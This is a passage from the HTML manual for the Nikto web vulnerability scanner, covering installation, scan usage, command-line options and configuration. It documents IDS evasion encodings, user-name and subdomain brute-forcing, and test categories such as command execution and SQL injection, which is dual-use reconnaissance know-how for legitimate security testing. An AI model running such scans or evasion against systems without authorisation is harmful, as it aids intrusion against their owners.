positives.</p><p>As of version 2.0 Nikto no longer assumes the error pages for\n      different file types will be the same. A list of unique file extensions\n      is generated at run-time (from the test database), and each of those\n      extensions is tested against the target. For every file type, the \"best\n      method\" of determining errors is found: standard RFC response, content\n      match or MD4 hash (in decreasing order of preference). This allows Nikto\n      to use the fastest and most accurate method for each individual file\n      type, and therefore help eliminate the false positives seen for some\n      servers in version 1.32 and below.</p><p>For example, if a server responds with a 404 \"not found\" error for\n      a non-existent .txt file, Nikto will match the HTTP response of \"404\" on\n      tests. If the server responds with a 200 \"OK\" response, it will try to\n      match on the content, and assuming it finds a match (for example, the\n      words \"could not be found\"), it will use this method for determining\n      missing .txt files. If the other methods fail, Nikto will attempt to\n      remove date and time strings (which can constantly change) from the\n      returned page's content, generate an MD5 hash of the content, and then\n      match that hash value against future .txt tests. The latter is by far\n      the slowest type of match, but in many cases will provide valid results\n      for a particular file type.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238011\"></a>History</h2></div></div></div><p>The Nikto 1.00 Beta was released on December 27, 2001, (followed\n      almost immediately by the 1.01 release). Over the course of two years\n      Nikto's code evolved into the most popular freely available web\n      vulnerability scanner. The 2.0 release, in November, 2007 represents\n      several years of improvements.</p><p>In 2008, due to other commitments, Sullo, the original author\n      couldn't continue to support Nikto and the code was released under the\n      GPL and passed to the community for support.</p></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"installation\"></a>Chapter2.Installation</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id238042\">Requirements</a></span></dt><dt><span class=\"section\"><a href=\"#id238232\">Install</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238042\"></a>Requirements</h2></div></div></div><p>Any system which supports a basic PERL installation should allow\n      Nikto to run. It has been extensively tested on:</p><div class=\"itemizedlist\"><ul type=\"disc\"><li><p>Windows (using ActiveState Perl)</p></li><li><p>Mac OSX</p></li><li><p>Various Linux and Unix installations (including RedHat,\n            Solaris, Debian, Knoppix, etc.)</p></li></ul></div><p>The only required PERL module that does not come standard is\n      LibWhisker. Nikto comes with and is configured to use a local LW.pm file\n      (in the plugins directory), but users may wish to change Nikto to use a\n      version installed on the system. See Section 2 for further\n      information.</p><p>For SSL support the Net::SSLeay PERL module must be installed\n      (which in turn requires OpenSSL on the Unix platform). Windows support\n      for SSL is dependent on the installation package, but is rumored to\n      exist for ActiveState's Perl.</p><p>The nmap scanner can also be used, if desired. In some cases using\n      nmap will slow down Nikto execution, as it must call an external\n      program. For scanning many ports across one or more servers, using nmap\n      will be faster than using Nikto's internal PERL scanning.</p><div class=\"itemizedlist\"><ul type=\"disc\"><li><p>PERL: <a class=\"ulink\" href=\"http://www.cpan.org/\" target=\"_top\">http://www.cpan.org/</a></p></li><li><p>LibWhisker: <a class=\"ulink\" href=\"http://www.wiretrip.net/\" target=\"_top\">http://www.wiretrip.net/</a></p></li><li><p>ActiveState Perl: <a class=\"ulink\" href=\"http://www.activestate.com/\" target=\"_top\">http://www.activestate.com/</a></p></li><li><p>OpenSSL: <a class=\"ulink\" href=\"http://www.openssl.org/\" target=\"_top\">http://www.openssl.org/</a></p></li><li><p>nmap: <a class=\"ulink\" href=\"http://www.insecure.org/\" target=\"_top\">http://insecure.org/</a></p></li></ul></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238232\"></a>Install</h2></div></div></div><p>These instructions do not include information on installing PERL,\n      PERL Modules, OpenSSL, LibWhisker or any of the utilities that may be\n      needed during installation (such as gzip, tar, etc.). Please see the\n      distributor's documentation for information on how to install and\n      configure those software packages.</p><p>Unpack the download file:</p><pre class=\"screen\">tar -xvfz nikto-current.tar.gz</pre><p>Assuming a standard OS/PERL installation, Nikto should now be\n      usable. See Chapter 4 (Options) or Chapter 8 (Troubleshooting) for\n      further configuration information.</p></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"usage\"></a>Chapter3.Usage</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id238272\">Basic Testing</a></span></dt><dt><span class=\"section\"><a href=\"#id238384\">Multiple Port Testing</a></span></dt><dt><span class=\"section\"><a href=\"#id238405\">Multiple Host Testing</a></span></dt><dt><span class=\"section\"><a href=\"#id238466\">Using a Proxy</a></span></dt><dt><span class=\"section\"><a href=\"#id238782\">Updating</a></span></dt><dt><span class=\"section\"><a href=\"#id238829\">Integration with Nessus</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238272\"></a>Basic Testing</h2></div></div></div><p>The most basic Nikto scan requires simply a host to target, since\n      port 80 is assumed if none is specified. The host can either be an IP or\n      a hostname of a machine, and is specified using the -h (-host) option.\n      This will scan the IP 192.168.0.1 on TCP port 80:</p><pre class=\"screen\">perl nikto.pl -h 192.168.0.1</pre><p>To check on a different port, specify the port number with the -p\n      (-port) option. This will scan the IP 192.168.0.1 on TCP port\n      443:</p><pre class=\"screen\">perl nikto.pl -h 192.168.0.1 -p 443</pre><p>Hosts, ports and protocols may also be specified by using a full\n      URL syntax, and it will be scanned:</p><pre class=\"screen\">perl nikto.pl -h https://192.168.0.1:443/</pre><p>There is no need to specify that port 443 may be SSL, as Nikto\n      will first test regular HTTP and if that fails, HTTPS. If you are sure\n      it is an SSL server, specifying -s (-ssl) will speed up the test.</p><pre class=\"screen\">perl nikto.pl -h 192.168.0.1 -p 443 -ssl</pre><div class=\"note\" style=\"margin-left: 0.5in; margin-right: 0.5in;\"><table border=\"0\" summary=\"Note\"><tr><td rowspan=\"2\" align=\"center\" valign=\"top\" width=\"25\"><img alt=\"[Note]\" src=\"note.png\"></td><th align=\"left\">Note</th></tr><tr><td align=\"left\" valign=\"top\"><p><em class=\"parameter\"><code>-mutate</code></em> 1 increases the number of tests so\n      that all filenames are tested against all databases inc\n      <code class=\"filename\">db_tests</code>. This will produce over 2,000,000 extra\n      tests, which will use up a massive amount of resource.</p></td></tr></table></div><p>More complex tests can be performed using the\n      <em class=\"parameter\"><code>-mutate</code></em> parameter, as detailed later. This can\n      produce extra tests, some of which may be provided with extra parameters\n      through the <em class=\"parameter\"><code>-mutate-options</code></em> parameter. For example,\n      using <em class=\"parameter\"><code>-mutate</code></em> 3, with or without a file attempts\n      to brute force usernames if the web server allows\n      ~<em class=\"replaceable\"><code>user</code></em> URIs:</p><pre class=\"screen\">perl nikto.pl -h 192.168.0.1 -mutate 3 -mutate-options user-list.txt</pre></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238384\"></a>Multiple Port Testing</h2></div></div></div><p>Nikto can scan multiple ports in the same scanning session. To\n      test more than one port on the same host, specify the list of ports in\n      the -p (-port) option. Ports can be specified as a range (i.e., 80-90),\n      or as a comma-delimited list, (i.e., 80,88,90). This will scan the host\n      on ports 80, 88 and 443.</p><pre class=\"screen\">perl nikto.pl -h 192.168.0.1 -p 80,88,443</pre></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238405\"></a>Multiple Host Testing</h2></div></div></div><p>Nikto support scanning multiple hosts in the same session via a\n      text file of host names or IPs. Instead of giving a host name or IP for\n      the -h (-host) option, a file name can be given. A file of hosts must be\n      formatted as one host per line, with the port number(s) at the end of\n      each line. Ports can be separated from the host and other ports via a\n      colon or a comma. If no port is specified, port 80 is assumed.</p><p>This is an example of a valid hosts file:</p><div class=\"example\"><a name=\"id238425\"></a><p class=\"title\"><b>Example3.1.Valid Hosts File</b></p><div class=\"example-contents\"><pre class=\"programlisting\">192.168.0.1:80\nhttp://192.168.0.1:8080/\n192.168.0.3</pre></div></div><br class=\"example-break\"><div class=\"note\" style=\"margin-left: 0.5in; margin-right: 0.5in;\"><table border=\"0\" summary=\"Note\"><tr><td rowspan=\"2\" align=\"center\" valign=\"top\" width=\"25\"><img alt=\"[Note]\" src=\"note.png\"></td><th align=\"left\">Note</th></tr><tr><td align=\"left\" valign=\"top\"><p>For win32 users: due to peculiaries in the way that cmd.exe\n         works with pipes, the above example may not work for you. In this case\n         a temporary file will have to be used to store the output from\n         nmap</p></td></tr></table></div><p>A host file may also be an nmap output in \"greppable\" format (i.e.\n      from the output from -oG).</p><p>A file may be passed to Nikto through stdout/stdin using a \"-\" as\n      the filename. For example:</p><pre class=\"screen\">nmap -p80 192.168.0.0/24 -oG - | nikto.pl -h -</pre></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238466\"></a>Using a Proxy</h2></div></div></div><p>If the machine running Nikto only has access to the target host\n      (or update server) via an HTTP proxy, the test can still be performed.\n      Set the <code class=\"varname\">PROXY*</code> variables (as described in section\n      4), then execute Nikto with the -u (-useproxy) command. All connections\n      will be relayed through the HTTP proxy specified in the configuration\n      file.</p><pre class=\"screen\">perl nikto.pl -h 192.168.0.1 -p 80 -u</pre></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238782\"></a>Updating</h2></div></div></div><p>Nikto can be automatically updated, assuming you have Internet\n      connectivity from the host Nikto is installed on. To update to the\n      latest plugins and databases, simply run Nikto with the -update\n      command.</p><div class=\"note\" style=\"margin-left: 0.5in; margin-right: 0.5in;\"><table border=\"0\" summary=\"Note\"><tr><td rowspan=\"2\" align=\"center\" valign=\"top\" width=\"25\"><img alt=\"[Note]\" src=\"note.png\"></td><th align=\"left\">Note</th></tr><tr><td align=\"left\" valign=\"top\"><p>The -update option cannot be abbreviated.</p></td></tr></table></div><pre class=\"screen\">perl nikto.pl -update</pre><p>If updates are required, you will see a list of the files\n      downloaded:</p><pre class=\"screen\">\n perl nikto.pl -update\n + Retrieving 'nikto_core.plugin'\n + Retrieving 'CHANGES.txt'\n      </pre><p>Updates may also be manually downloaded from <a class=\"ulink\" href=\"http://www.cirt.net/\" target=\"_top\">http://www.cirt.net/</a></p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238829\"></a>Integration with Nessus</h2></div></div></div><p>Nessus (<a class=\"ulink\" href=\"http://www.nessus.org/\" target=\"_top\">http://www.nessus.org/nessus/</a>) can\n      be configured to automatically launch Nikto when it finds a web server.\n      Ensure Nikto works properly, then place the directory containing\n      nikto.pl in root's PATH environment variable. When nessusd starts, it\n      should see the nikto.pl program and enable usage through the\n      GUI.</p></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"options\"></a>Chapter4.Command Line Options</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id238858\">All Options</a></span></dt><dt><span class=\"section\"><a href=\"#id286918\">Mutation Techniques</a></span></dt><dt><span class=\"section\"><a href=\"#id287020\">Display</a></span></dt><dt><span class=\"section\"><a href=\"#id287094\">Scan Tuning</a></span></dt><dt><span class=\"section\"><a href=\"#id287290\">Single Request Mode</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id238858\"></a>All Options</h2></div></div></div><p>Below are all of the Nikto command line options and explanations. A\nbrief version of this text is available by running Nikto with the -h\n(-help) option.</p><div class=\"variablelist\"><dl><dt><span class=\"term\"><code class=\"option\">-Cgidirs</code></span></dt><dd><p>Scan these CGI directories. Special words \"none\" or \"all\" may\nbe used to scan all CGI directories or none, (respectively). A\nliteral value for a CGI directory such as \"/cgi-test/\" may be\nspecified (must include trailing slash). If this is option is not\nspecified, all CGI directories listed in config.txt will be\ntested.</p></dd><dt><span class=\"term\"><code class=\"option\">-config</code></span></dt><dd><p>Specify an alternative config file to use instead of the\nconfig.txt located in the install directory.</p></dd><dt><span class=\"term\"><code class=\"option\">-dbcheck</code></span></dt><dd><p>Check the scan databases for syntax errors.</p></dd><dt><span class=\"term\"><code class=\"option\">-Display</code></span></dt><dd><p>Control the output that Nikto shows. See Chapter 5 for\ndetailed information on these options. Use the reference number or\nletter to specify the type, multiple may be used:</p><p>1 - Show redirects</p><p>2 - Show cookies received</p><p>3 - Show all 200/OK responses</p><p>4 - Show URLs which require authentication</p><p>D - Debug Output</p><p>V - Verbose Output</p></dd><dt><span class=\"term\"><code class=\"option\">-evasion</code></span></dt><dd><p>Specify the LibWhisker IDS evasion technique to use (see the\nLibWhisker docs for detailed information on these). Use the\nreference number to specify the type, multiple may be used:</p><p>1 - Random URI encoding (non-UTF8)</p><p>2 - Directory self-reference (/./)</p><p>3 - Premature URL ending</p><p>4 - Prepend long random string</p><p>5 - Fake parameter</p><p>6 - TAB as request spacer</p><p>7 - Change the case of the URL</p><p>8 - Use Windows directory separator (\\)</p></dd><dt><span class=\"term\"><code class=\"option\">-findonly</code></span></dt><dd><p>Only discover the HTTP(S) ports, do not perform a security scan.\nThis will attempt to connect with HTTP or HTTPS, and report the\nServer header.</p></dd><dt><span class=\"term\"><code class=\"option\">-Format</code></span></dt><dd><p>Save the output file specified with -o (-output) option in\nthis format. If not specified, the default will be taken from the file\nextension specified in the -output option. Valid formats are:</p><p>csv - a comma-seperated list</p><p>htm - an HTML report</p><p>txt - a text report</p><p>xml - an XML report</p></dd><dt><span class=\"term\"><code class=\"option\">-host</code></span></dt><dd><p>Host(s) to target. Can be an IP address, hostname or text file\nof hosts. A single dash (-) maybe used for stdout. Can also parse nmap -oG\nstyle output</p></dd><dt><span class=\"term\"><code class=\"option\">-Help</code></span></dt><dd><p>Display extended help information.</p></dd><dt><span class=\"term\"><code class=\"option\">-id</code></span></dt><dd><p>ID and password to use for host Basic host authentication.\nFormat is \"id:password\".</p></dd><dt><span class=\"term\"><code class=\"option\">-list-plugins</code></span></dt><dd><p>Will list all plugins that Nikto can run against targets and\n\t\tthen will exit without performing a scan. These can be tuned for a\n\t\tsession using the -plugins option.</p><p>The output format is:</p><p>Plugin <code class=\"varname\">name</code></p><p><code class=\"varname\">full name</code> - <code class=\"varname\">description</code>\n\t\t</p><p>Written by <code class=\"varname\">author</code>, Copyright (C)\n\t\t<code class=\"varname\">copyright</code></p></dd><dt><span class=\"term\"><code class=\"option\">-mutate</code></span></dt><dd><p>Specify mutation technique. A mutation will cause Nikto to\ncombine tests or attempt to guess values. These techniques may cause\na tremendous amount of tests to be launched against the target. Use\nthe reference number to specify the type, multiple may be\nused:</p><p>1 - Test all files with all root directories</p><p>2 - Guess for password file names</p><p>3 - Enumerate user names via Apache (/~user type\nrequests)</p><p>4 - Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user\ntype requests)</p><p>5 - Attempt to brute force sub-domain names, assume that\n        the host name is the parent domain</p><p>6 - Attempt to guess directory names from the supplied\n        dictionary file</p></dd><dt><span class=\"term\"><code class=\"option\">-mutate-options</code></span></dt><dd><p>Provide extra information for mutates, e.g. a dictionary\n        file</p></dd><dt><span class=\"term\"><code class=\"option\">-nolookup</code></span></dt><dd><p>Do not perform name lookups on IP addresses.</p></dd><dt><span class=\"term\"><code class=\"option\">-nossl</code></span></dt><dd><p>Do not use SSL to connect to the server.</p></dd><dt><span class=\"term\"><code class=\"option\">-no404</code></span></dt><dd><p>Disable 404 (file not found) checking. This will reduce\n        the total number of requests made to the webserver and may be\n        preferable when checking a server over a slow link, or an embedded\n        device. This will generally lead to more false positives being\n        discovered.</p></dd><dt><span class=\"term\"><code class=\"option\">-output</code></span></dt><dd><p>Write output to the file specified. The format used will be\n\t\ttaken from the file extension. This can be over-riden by using the\n\t\t-Format option (e.g. to write text files with a different extenstion.\n\t\tExisting files will have new information appended.</p></dd><dt><span class=\"term\"><code class=\"option\">-plugins</code></span></dt><dd><p>Select which plugins will be run on the specified targets. A\n\t\tcomma separated list should be provided which lists the names of the\n\t\tplugins. The names can be found by using -list-plugins.</p><p>There are two special entries: ALL, which specifies all plugins\n\t\tshall be run and NONE, which specifies no plugins shall be run. The\n\t\tdefault is ALL</p></dd><dt><span class=\"term\"><code class=\"option\">-port</code></span></dt><dd><p>TCP port(s) to target. To test more than one port on the same\nhost, specify the list of ports in the -p (-port) option. Ports can\nbe specified as a range (i.e., 80-90), or as a comma-delimited list,\n(i.e., 80,88,90). If not specified, port 80 is used.</p></dd><dt><span class=\"term\"><code class=\"option\">-Pause</code></span></dt><dd><p>Seconds to delay between each test.</p></dd><dt><span class=\"term\"><code class=\"option\">-root</code></span></dt><dd><p>Prepend the value specified to the beginning of every request.\nThis is useful to test applications or web servers which have all of\ntheir files under a certain directory.</p></dd><dt><span class=\"term\"><code class=\"option\">-ssl</code></span></dt><dd><p>Only test SSL on the ports specified. Using this option will\ndramatically speed up requests to HTTPS ports, since otherwise the\nHTTP request will have to timeout first.</p></dd><dt><span class=\"term\"><code class=\"option\">-Single</code></span></dt><dd><p>Perform a single request to a target server. Nikto will prompt\nfor all options which can be specified, and then report the detailed\noutput. See Chapter 5 for detailed information.</p></dd><dt><span class=\"term\"><code class=\"option\">-timeout</code></span></dt><dd><p>Seconds to wait before timing out a request. Default timeout\nis 10 seconds.</p></dd><dt><span class=\"term\"><code class=\"option\">-Tuning</code></span></dt><dd><p>Tuning options will control the test that Nikto will use\nagainst a target. By default, if any options are specified, only\nthose tests will be performed. If the \"x\" option is used, it will\nreverse the logic and exclude only those tests. Use the reference\nnumber or letter to specify the type, multiple may be used:</p><p>0 - File Upload</p><p>1 - Interesting File / Seen in logs</p><p>2 - Misconfiguration / Default File</p><p>3 - Information Disclosure</p><p>4 - Injection (XSS/Script/HTML)</p><p>5 - Remote File Retrieval - Inside Web Root</p><p>6 - Denial of Service</p><p>7 - Remote File Retrieval - Server Wide</p><p>8 - Command Execution / Remote Shell</p><p>9 - SQL Injection</p><p>a - Authentication Bypass</p><p>b - Software Identification</p><p>c - Remote Source Inclusion</p><p>x - Reverse Tuning Options (i.e., include all except\nspecified)</p><p>The given string will be parsed from left to right, any x\n        characters will apply to all characters to the right of the\n        character.</p></dd><dt><span class=\"term\"><code class=\"option\">-useproxy</code></span></dt><dd><p>Use the HTTP proxy defined in the configuration file.</p></dd><dt><span class=\"term\"><code class=\"option\">-update</code></span></dt><dd><p>Update the plugins and databases directly from\ncirt.net.</p></dd><dt><span class=\"term\"><code class=\"option\">-Version</code></span></dt><dd><p>Display the Nikto software, plugin and database\nversions.</p></dd><dt><span class=\"term\"><code class=\"option\">-vhost</code></span></dt><dd><p>Specify the Host header to be sent to the target.</p></dd></dl></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id286918\"></a>Mutation Techniques</h2></div></div></div><p>A mutation will cause Nikto to combine tests or attempt to guess\n      values. These techniques may cause a tremendous amount of tests to be\n      launched against the target. Use the reference number to specify the\n      type, multiple may be combined.</p><div class=\"orderedlist\"><ol type=\"1\"><li><p>Test all files with all root directories. This takes each test\n            and splits it into a list of files and directories. A scan list is\n            then created by combining each file with each directory.</p></li><li><p>Guess for password file names. Takes a list of common password\n            file names (such as \"passwd\", \"pass\", \"password\") and file\n            extensions (\"txt\", \"pwd\", \"bak\", etc.) and builds a list of files\n            to check for.</p></li><li><p>Enumerate user names via Apache (/~user type requests).\n            Exploit a misconfiguration with Apache UserDir setups which allows\n            valid user names to be discovered. This will attempt to brute-force\n            guess user names. A file of known users can also be supplied by\n            supplying the file name in the\n            <em class=\"parameter\"><code>-mutate-options</code></em> parameter.</p></li><li><p>Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user\n            type requests). Exploit a flaw in cgiwrap which allows valid user\n            names to be discovered. This will attempt to brute-force guess user\n            names. A file of known users can also be supplied by supplying the\n            file name in the <em class=\"parameter\"><code>-mutate-options</code></em>\n            parameter.</p></li><li><p>Attempt to brute force sub-domain names. This will\n            attempt to brute force know domain names, it will assume the given\n            host (without a www) is the parent domain.</p></li><li><p>Attempt to brute directory names. This is the only mutate\n            option that requires a file to be passed in the\n            <em class=\"parameter\"><code>-mutate-options</code></em> parameter. It will use the\n            given file to attempt to guess directory names. Lists of common\n            directories may be found in the OWASP DirBuster project.</p></li></ol></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id287020\"></a>Display</h2></div></div></div><p>By default only some basic information about the target and\n      vulnerabilities is shown. Using the <em class=\"parameter\"><code>-Display</code></em>\n      parameter can produce more information for debugging issues.</p><div class=\"itemizedlist\"><ul type=\"disc\"><li><p>1 - Show redirects. This will display all requests which\n            elicit a \"redirect\" response from the server.</p></li><li><p>2 - Show cookies received. This will display all cookies that\n            were sent by the remote host.</p></li><li><p>3 - Show all 200/OK responses. This will show all responses\n            which elicit an \"okay\" (200) response from the server. This could be\n            useful for debugging.</p></li><li><p>4 - Show URLs which require authentication. This will show all\n            responses which elicit an \"authorization required\" header.</p></li><li><p>D - Debug Output. Show debug output, which shows the verbose\n            output and extra information such as variable content.</p></li><li><p>V - Verbose Output. Show verbose output, which typically shows\n            where Nikto is during program execution.</p></li></ul></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id287094\"></a>Scan Tuning</h2></div></div></div><p>Scan tuning can be used to decrease the number of tests performed\n      against a target. By specifying the type of test to include or exclude,\n      faster, focused testing can be completed. This is useful in situations\n      where the presence of certain file types are undesired -- such as XSS or\n      simply \"interesting\" files.</p><p>Test types can be controlled at an individual level by specifying\n      their identifier to the <em class=\"parameter\"><code>-T</code></em>\n      (<em class=\"parameter\"><code>-Tuning</code></em>) option. In the default mode, if\n      <em class=\"parameter\"><code>-T</code></em> is invoked only the test type(s) specified\n      will be executed. For example, only the tests for \"Remote file\n      retrieval\" and \"Command execution\" can performed against the\n      target:</p><pre class=\"screen\">perl nikto.pl -h 192.168.0.1 -T 58</pre><p>If an \"x\" is passed to <em class=\"parameter\"><code>-T</code></em> then this will\n      negate all tests of types following the x. This is useful where a test\n      may check several different types of exploit. For example:</p><pre class=\"screen\">perl nikto.pl -h 192.168.0.1 -T 58xb</pre><p>The valid tuning options are:</p><div class=\"itemizedlist\"><ul type=\"disc\"><li><p>0 - File Upload. Exploits which allow a file to be\n            uploaded to the target server.</p></li><li><p>1 - Interesting File / Seen in logs. An unknown but suspicious\n            file or attack that has been seen in web server logs (note: if you\n            have information regarding any of these attacks, please contact us).\n            </p></li><li><p>2 - Misconfiguration / Default File. Default files or files\n            which have been misconfigured in some manner. This could be\n            documentation, or a resource which should be password\n            protected.</p></li><li><p>3 - Information Disclosure. A resource which reveals\n            information about the target. This could be a file system path or\n            account name.</p></li><li><p>4 - Injection (XSS/Script/HTML). Any manner of injection,\n            including cross site scripting (XSS) or content (HTML). This does\n            not include command injection.</p></li><li><p>5 - Remote File Retrieval - Inside Web Root. Resource allows\n            remote users to retrieve unauthorized files from within the web\n            server's root directory.</p></li><li><p>6 - Denial of Service. Resource allows a denial of service\n            against the target application, web server or host (note: no\n            intentional DoS attacks are attempted).</p></li><li><p>7 - Remote File Retrieval - Server Wide. Resource allows\n            remote users to retrieve unauthorized files from anywhere on the\n            target.</p></li><li><p>8 - Command Execution / Remote Shell. Resource allows the user\n            to execute a system command or spawn a remote shell.</p></li><li><p>9 - SQL Injection. Any type of attack which allows SQL to be\n            executed against a database.</p></li><li><p>a - Authentication Bypass. Allows client to access a\n            resource it should not be allowed to access.</p></li><li><p>b - Software Identification. Installed software or program\n            could be positively identified.</p></li><li><p>c - Remote source inclusion. Software allows remote inclusion\n            of source code.</p></li><li><p>x - Reverse Tuning Options. Perform exclusion of the specified\n            tuning type instead of inclusion of the specified tuning\n            type.</p></li></ul></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id287290\"></a>Single Request Mode</h2></div></div></div><p>Single request mode is designed to preform a solitary request\n      against the target. This is useful to confirm a test result using the\n      same resources Nikto used during a scan. The single option allows manual\n      setting of most variables used by Nikto and LibWhisker, and upon\n      completion will display both the request and the result of the\n      operation.</p><p>Most options have a default value or can be left blank. The most\n      common and required values are at the beginning of the \"questions\"\n      section for slightly easier use. True and false are specified by numeric\n      equivalents, 1 and 0 respectively. Please note that Single mode is not\n      very user-friendly. Here is an example Nikto run with the\n      <em class=\"parameter\"><code>-Single</code></em> option.</p><pre class=\"screen\">\n\n[dave@yggdrasil nikto-2.03]$ ./nikto.pl -Single\n--------------------------------------------  Nikto 2.1.0\n--------------------------------------------  Single Request Mode\n                              Hostname or IP: localhost\n                                   Port (80):\n                                     URI (/): /test.html\n                                     SSL (0):\n                                  Proxy host:\n                                  Proxy port:\n                      Show HTML Response (1):\n                          HTTP Version (1.1):\n                           HTTP Method (GET):\n      User-Agent (Mozilla/4.75 (Nikto/2.1.0):\n                     Connection (Keep-Alive):\n                                        Data:\n                        force_bodysnatch (0):\n                             force_close (1):\n                             http_space1 ( ):\n                             http_space2 ( ):\n                     include_host_in_uri (0):\n           invalid_protocol_return_value (1):\n                                max_size (0):\n                             protocol (HTTP):\n           require_newline_after_headers (0):\n                                   retry (0):\n                           ssl_save_info (0):\n                                timeout (10):\n                             uri_password ():\n                              uri_postfix ():\n                               uri_prefix ():\n                                 uri_user ():\n                         Enable Anti-IDS (0):\n--------------------------------------------  Done with questions\n        Host Name: localhost\n        Host IP: 127.0.0.1\n        HTTP Response Code: 404\n--------------------------------------------  Connection Details\n        Connection: Keep-Alive\n        Host: localhost\n        User-Agent: Mozilla/4.75 (Nikto/2.1.0\n        data:\n        force_bodysnatch: 0\n        force_close: 1\n        force_open: 0\n        host: localhost\n        http_space1:\n        http_space2:\n        ignore_duplicate_headers: 1\n        include_host_in_uri: 0\n        invalid_protocol_return_value: 1\n        max_size: 0\n        method: GET\n        port: 80\n        protocol: HTTP\n        require_newline_after_headers: 0\n        retry: 0\n        ssl: 0\n        ssl_save_info: 0\n        timeout: 10\n        trailing_slurp: 0\n        uri: /test.html\n        uri_param_sep: ?\n        uri_postfix:\n        uri_prefix:\n        version: 1.1\n--------------------------------------------  Response Headers\n        Connection: close\n        Content-Length: 268\n        Content-Type: text/html; charset=iso-8859-1\n        Date: Tue, 18 Aug 2009 10:13:57 GMT\n        Server: Apache/2\n        code: 404\n        http_data_sent: 1\n        http_eol:\n\n        http_space1:\n        http_space2:\n        message: Not Found\n        protocol: HTTP\n        uri: /test.html\n        version: 1.1\n--------------------------------------------  Response Content\n&lt;!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;404 Not Found&lt;/title&gt;\n&lt;/head&gt;&lt;body&gt;\n&lt;h1&gt;Not Found&lt;/h1&gt;\n&lt;p&gt;The requested URL /test.html was not found on this server.&lt;/p&gt;\n&lt;hr&gt;\n&lt;address&gt;Apache/2 Server at localhost Port 80&lt;/address&gt;\n&lt;/body&gt;&lt;/html&gt;\n\n</pre></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"configuration\"></a>Chapter5.Configuration Files</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id287336\">Location</a></span></dt><dt><span class=\"section\"><a href=\"#id237396\">Format</a></span></dt><dt><span class=\"section\"><a href=\"#id237410\">Variables</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id287336\"></a>Location</h2></div></div></div><p>Nikto, like any non-trivial program needs to know a few things\n      about how to work with the current environment. For most situations the\n      default configuration file will work. Sometimes, tuning may be required,\n      or some things may need to be changes.</p><p>Nikto will look for a configuration file in three places and if it\n      finds one, will apply it in the strict order, listed below. A later found\n      configuration file will overwrite any variables set in an earlier\n      configuration file. The locations are:</p><div class=\"orderedlist\"><ol type=\"1\"><li><p>/etc/nikto.conf (this may be altered depending on\n            platform)</p></li><li><p>$HOME/nikto.conf</p></li><li><p>nikto.conf</p></li></ol></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id237396\"></a>Format</h2></div></div></div><p>The configuration files are formated like a standard Unix\n      configuration file: blank lines are ignored, any line starting with a #\n      is ignored, variables are set with VariableName=Value line.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id237410\"></a>Variables</h2></div></div></div><p>The following variables may be set within the configuration\n      file:</p><div class=\"variablelist\"><dl><dt><span class=\"term\"><code class=\"varname\">CLIOPTS</code></span></dt><dd><p>Default options that should always be passed to the\n               command line. For example:</p><pre class=\"screen\">CLIOPTS=-output results.txt -Format text</pre><p>Default Setting</p><pre class=\"screen\">CLIOPTS=</pre></dd><dt><span class=\"term\"><code class=\"varname\">NIKTODTD</code></span></dt><dd><p>Path to the location of the DTD used for XML output. If the\n               path is not absolute then it will be relative to the directory\n               where Nikto is executed.</p><p>Default Setting</p><pre class=\"screen\">NIKTODTD=docs/nikto.dtd</pre></dd><dt><span class=\"term\"><code class=\"varname\">NMAP</code>, </span><span class=\"term\"><code class=\"varname\">NMAPOPTS</code></span></dt><dd><p><span 